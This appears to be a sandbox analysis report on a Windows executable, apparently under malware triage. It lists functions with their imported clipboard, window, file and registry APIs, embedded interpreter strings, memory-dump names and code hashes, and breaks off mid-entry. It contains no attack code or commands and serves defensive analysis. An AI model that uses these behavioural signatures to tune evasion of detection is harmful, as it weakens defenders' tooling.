Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Message$PostSendTimeout$DrawIconNtdllProc_Window
String ID:
API String ID: 1088757671-0
Opcode ID: fb11dcab3284c8d05e6ae30fc33d916975951350631bd17bc4de1dad67b53ddb
Instruction ID: c820e7d899a203a3af578f66b8185bdd308cecfbdef045eeb8de588360cbacb1
Opcode Fuzzy Hash: fb11dcab3284c8d05e6ae30fc33d916975951350631bd17bc4de1dad67b53ddb
Instruction Fuzzy Hash: ACF0A735304A8081EBB3DB9356003E52791B74DBC4F894422FF55137B5CE74C8439308

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043BF6, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 0000000140044216

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 62622c34895ee0d23c1b039052e45d9227453d39b1fb03032edbf7267d90e201
Instruction ID: d7931c925492d82cbc0c6ad9b692d5af65a61181cd1847d2e2c9c98be7bcbedc
Opcode Fuzzy Hash: 62622c34895ee0d23c1b039052e45d9227453d39b1fb03032edbf7267d90e201
Instruction Fuzzy Hash: E3F08C36310A8086E2A2DB13E410BC52360B74CBC4F854822AF4813B25CE74C946D704

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000243A, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 258windowthreadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001A20
GetTickCount.KERNEL32 ref: 0000000140001A7F
GetMessageW.USER32 ref: 0000000140001AC9
GetTickCount.KERNEL32 ref: 0000000140001AD8
GetFocus.USER32 ref: 0000000140001E50
GetTickCount.KERNEL32 ref: 000000014000255D
GetForegroundWindow.USER32 ref: 00000001400025FB
GetWindowThreadProcessId.USER32 ref: 0000000140002612
GetClassNameW.USER32 ref: 0000000140002634
IsDialogMessageW.USER32 ref: 0000000140002689
SetCurrentDirectoryW.KERNEL32 ref: 00000001400026A7
ShowWindow.USER32 ref: 000000014000279C
DragFinish.SHELL32 ref: 0000000140002A6D
GetTickCount.KERNEL32 ref: 0000000140002AE8
GetTickCount.KERNEL32 ref: 0000000140002BA2
GetTickCount.KERNEL32 ref: 0000000140002C3F

Strings

C:\Users\user\Desktop, xrefs: 00000001400026A0
#32770, xrefs: 0000000140002644
MZ@, xrefs: 00000001400024B5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$Window$Message$ClassCurrentDialogDirectoryDragFinishFocusForegroundNameProcessShowThread
String ID: #32770$C:\Users\user\Desktop$MZ@
API String ID: 1886724341-3156277239
Opcode ID: 743bdd612b2ff2a1dd4a2752252140c4647a1c216253e574c6dbfa53cd8aa1e7
Instruction ID: ff748b6744ce57a4b80a0367a6368a3dc3ffdf12ee9d0cb97a70d642a2739d4d
Opcode Fuzzy Hash: 743bdd612b2ff2a1dd4a2752252140c4647a1c216253e574c6dbfa53cd8aa1e7
Instruction Fuzzy Hash: A5C1AEB1605B8086FB67CB2BA4683E927E0E78DBD4F184025EB4A07BF5DB78C445C711

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002AA68, Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 316windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3

Strings

p, xrefs: 000000014002ABAD
Jumps cannot exit a FINALLY block., xrefs: 000000014002F32E
MZ@, xrefs: 0000000140029CB8, 0000000140029CD4
o, xrefs: 000000014002AB3F
p, xrefs: 000000014002AA73

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickWire
String ID: Jumps cannot exit a FINALLY block.$MZ@$o$p$p
API String ID: 1628889810-1267260696
Opcode ID: 10725f0d54f7ea3174d85150bd355fc8fff31ac4b9f596eb94979921d08697af
Instruction ID: 6408a75655731cee4c89b8ba28a4b46e828c2701104e533e5788450dda7c7bea
Opcode Fuzzy Hash: 10725f0d54f7ea3174d85150bd355fc8fff31ac4b9f596eb94979921d08697af
Instruction Fuzzy Hash: 58F15C72704B408AFB66CB2AE4903E927A1F74DBD4F54412AEB5987AB5DF38CD81C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140029F44, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 275windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3

Strings

Target label does not exist., xrefs: 000000014002F215
MZ@, xrefs: 0000000140029CB8, 0000000140029CD4
A Goto/Gosub must not jump into a block that doesn't enclose it., xrefs: 0000000140029FF8

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickWire
String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$MZ@$Target label does not exist.
API String ID: 1628889810-1182089384
Opcode ID: 37abcf2fc07e0d9d5306928813b07e2330aa74609225d583a4067ddc574f8ce4
Instruction ID: dfb8b4a533078902b985740af981d1f4d02d624242c14cb926da29ee495ef38d
Opcode Fuzzy Hash: 37abcf2fc07e0d9d5306928813b07e2330aa74609225d583a4067ddc574f8ce4
Instruction Fuzzy Hash: 95D15A72714A4086EBA6CB2BE5903E923E1F74DBD4F54412AEB5987AB4DF38CC91C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A1BC, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 285clipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4
A Goto/Gosub must not jump into a block that doesn't enclose it., xrefs: 000000014002F242

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCloseCountGlobalTickWire
String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$MZ@
API String ID: 670262367-2280719295
Opcode ID: aef0ef23336d108aa99a6b08a98fcf9d3653809fd91ea1473881a113cd57651f
Instruction ID: 133c476e1d0895eb5d1dd7d0cf87f647f6be5d67875812059295705e2d17ad93
Opcode Fuzzy Hash: aef0ef23336d108aa99a6b08a98fcf9d3653809fd91ea1473881a113cd57651f
Instruction Fuzzy Hash: D9D16AB2701A4086EB66DB2BE5903E927E1F74DBD4F54412AEB5987AB5DF38CC81C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A7B8, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 252clipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
GetCPInfo.KERNEL32 ref: 000000014002A7EC

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCloseCountGlobalInfoTickWire
String ID: MZ@
API String ID: 2938037875-2978689999
Opcode ID: 7b9ccd575cc6379d1c87cb9e43bcb85668a5810824061fdac06ee1b393ad01ca
Instruction ID: b5664b9d1fa94c60f95198abfba41842bb8c870c74c77b610e2a48b1582d70f8
Opcode Fuzzy Hash: 7b9ccd575cc6379d1c87cb9e43bcb85668a5810824061fdac06ee1b393ad01ca
Instruction Fuzzy Hash: DCD12F72614B408AEB66DF2AE8843D937A1F74D7D8F50421AEB9987BF5DB38C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A91C, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 227registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
RegCloseKey.ADVAPI32 ref: 000000014002A9B7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekWire
String ID: MZ@
API String ID: 1928398982-2978689999
Opcode ID: a71d1c84c710a2b9291b268e1668ab81f82fea8be2974e81a778211ed9a76d53
Instruction ID: 63273e95ddd893f0d1bf9cabbb5a04a0e30bf8e665f06e222939cd05404f47d8
Opcode Fuzzy Hash: a71d1c84c710a2b9291b268e1668ab81f82fea8be2974e81a778211ed9a76d53
Instruction Fuzzy Hash: F4B11C72604B408AEB56DB6BE8843D937E1F34DBD4F54412AEB9987BB5DB38C891C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A770, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 202windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4
CSV, xrefs: 000000014002A770

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire_invalid_parameter_noinfo
String ID: CSV$MZ@
API String ID: 2223778145-3025936924
Opcode ID: e449492d15172af671787ee93ecff4c780cedaeb6369828dc9e2f9a8c0b0a8a6
Instruction ID: fd3e982d695879213dcd4efd1a1d0a6e967e65728d572bd63d95787c35c76bea
Opcode Fuzzy Hash: e449492d15172af671787ee93ecff4c780cedaeb6369828dc9e2f9a8c0b0a8a6
Instruction Fuzzy Hash: A4A15DB1704B4086EB66CB2BE8803E937E1F34DBD4F54421AEB9987AB5DB38C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B9984, Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B96B4: _invalid_parameter_noinfo.LIBCMT ref: 00000001400B96F5
Part of subcall function 00000001400B96B4: _invalid_parameter_noinfo.LIBCMT ref: 00000001400B9772
Part of subcall function 00000001400B96B4: _invalid_parameter_noinfo.LIBCMT ref: 00000001400B97C3
Part of subcall function 00000001400B96B4: _get_daylight.LIBCMT ref: 00000001400B981F

CreateFileW.KERNEL32 ref: 00000001400B9A85
CreateFileW.KERNEL32 ref: 00000001400B9AE1
GetLastError.KERNEL32 ref: 00000001400B9B15
GetFileType.KERNEL32 ref: 00000001400B9B2A
GetLastError.KERNEL32 ref: 00000001400B9B34
CloseHandle.KERNEL32 ref: 00000001400B9B67
CloseHandle.KERNEL32 ref: 00000001400B9CC0
CreateFileW.KERNEL32 ref: 00000001400B9CF8
GetLastError.KERNEL32 ref: 00000001400B9D07

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: 24eba0ec0c075d75d0a5c8eeb815f49741bbc48676be5e398f9f3b338f8d23c6
Instruction ID: 0e04bc5879f625341ba08d040bfcb54e3f8489371c56cef55d4ddf1e76f7d51e
Opcode Fuzzy Hash: 24eba0ec0c075d75d0a5c8eeb815f49741bbc48676be5e398f9f3b338f8d23c6
Instruction Fuzzy Hash: 80C1BB32724E408AEB558FA6D4917EC37B1E389BE8F015219EF2A5B7E6DB38C015C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140029AF0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 307windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4, 0000000140029F1C

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: d20b54f11840a222cc92b97bd43070f85f49f34ea6427f488d0dc40c5b56ccf4
Instruction ID: b08244215024417e093408eabe51826c2d89fc0bdcb5475e09bb2ddf85b3d868
Opcode Fuzzy Hash: d20b54f11840a222cc92b97bd43070f85f49f34ea6427f488d0dc40c5b56ccf4
Instruction Fuzzy Hash: BAE16E72604B808AE766CB6AE8443E977E1F74CBD4F54422AEB9983BB5DB34CD51C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A6D8, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: aa28be4d2e1a4a0680ceb63b2f7a9c785f296464fe7ee8d0ad71e7d7d362109a
Instruction ID: 7ca6f43e94cfd05807c40a72f7ad625cfd542d84cb84c80722a01e77b1443252
Opcode Fuzzy Hash: aa28be4d2e1a4a0680ceb63b2f7a9c785f296464fe7ee8d0ad71e7d7d362109a
Instruction Fuzzy Hash: CEA13D71604B8086EB66CB2BE9843E937E1F34DBD4F54421AEB9987AB5DB38C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A8D3, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 201windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140032DC0: FindFirstFileW.KERNEL32 ref: 0000000140032EA0
Part of subcall function 0000000140032DC0: FindNextFileW.KERNEL32 ref: 0000000140032F2E

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$FileFind$ClipboardCloseFirstGlobalMessageNextPeekWire
String ID: MZ@
API String ID: 1514775855-2978689999
Opcode ID: fb3aa0bc897e0c9c961935b0ca7b8927761fb37b680a0d3216ecf55ac4f40105
Instruction ID: b1011a9cedaf87c0b737732ad7256eaea8551987a0ad50ab3cdf1c056dfbafdb
Opcode Fuzzy Hash: fb3aa0bc897e0c9c961935b0ca7b8927761fb37b680a0d3216ecf55ac4f40105
Instruction Fuzzy Hash: BDA13CB1604B8086EB66DB2BE9803D937E1F34DBD4F54421AEB9987BB5DB34C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A6EF, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 199windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: 2a0879cb26b61ffa3b6ba921dfcb40fc9737490f814f6fa01de604188b4ae38c
Instruction ID: 6818b8c62adde42bb751f432f939081dde9776461cc39f90827d7f982495d5c6
Opcode Fuzzy Hash: 2a0879cb26b61ffa3b6ba921dfcb40fc9737490f814f6fa01de604188b4ae38c
Instruction Fuzzy Hash: 50A13C71604B8086EB66CB6BE9843E937E1F34DBD4F54421AEB9987BB5DB38C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A748, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: df55a71ba918d09a6c0341784bb4b6df6fee653ad5183ac193da78b06c3a717f
Instruction ID: ec59d67dd8e0bcac62b431d342fe7a8dc72599e435d02df47adaa873fe52caee
Opcode Fuzzy Hash: df55a71ba918d09a6c0341784bb4b6df6fee653ad5183ac193da78b06c3a717f
Instruction Fuzzy Hash: 51A13DB1704B4086EB66CB6BE9843E937E1F34DBD4F54421AEB9987AB5DB34C851C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002A725, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 194windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 0000000140029B8A
CloseClipboard.USER32 ref: 0000000140029B99
GetTickCount.KERNEL32 ref: 0000000140029BAE
PeekMessageW.USER32 ref: 0000000140029BE3
GetTickCount.KERNEL32 ref: 0000000140029BF7
GetTickCount.KERNEL32 ref: 0000000140029CC7

Strings

MZ@, xrefs: 0000000140029CB8, 0000000140029CD4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
String ID: MZ@
API String ID: 849950280-2978689999
Opcode ID: 4c2a0f0b9636227887219dd18b533bb99c686f22abcbd621c92328b20fc573e8
